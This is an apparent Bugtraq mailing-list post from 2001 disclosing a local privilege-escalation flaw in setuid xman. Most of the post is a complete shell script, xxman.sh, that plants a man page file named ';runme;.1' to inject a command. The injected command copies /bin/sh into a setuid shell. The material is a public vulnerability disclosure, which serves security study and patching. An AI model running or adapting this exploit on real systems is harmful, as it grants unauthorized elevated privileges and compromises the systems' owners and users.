Date: 17 Jul 2001 20:28:08 -0000
From: v9@realhalo.org
To: bugtraq@securityfocus.com
Subject: xman (suid) exploit, made easier.
xman doesn't drop privileges anywheres in the
program. but, does support suid installation. so,
exploiting via a system call is much easier than the
buffer overflow in MANPATH, mentioned in another
bugtraq posting. here is an example of such an
exploitation possibility:
-- xxman.sh --
#!/bin/sh
# example of xman exploitation. xman
# supports privileges. but, never
# drops them.
# Vade79 -> v9@realhalo.org -> realhalo.org.
MANPATH=~/xmantest/
mkdir -p ~/xmantest/man1
cd ~/xmantest/man1
touch ';runme;.1'
cat << EOF >~/xmantest/runme
#!/bin/sh
cp /bin/sh ~/xmansh
chown `id -u` ~/xmansh
chmod 4755 ~/xmansh
EOF
chmod 755 ~/xmantest/runme
echo "click the ';runme;' selection," \
"exit. then, check for ~/xmansh."
xman -bothshown -notopbox
rm -rf ~/xmantest
-- xxman.sh --
Vade79 -> v9@realhalo.org -> realhalo.org.
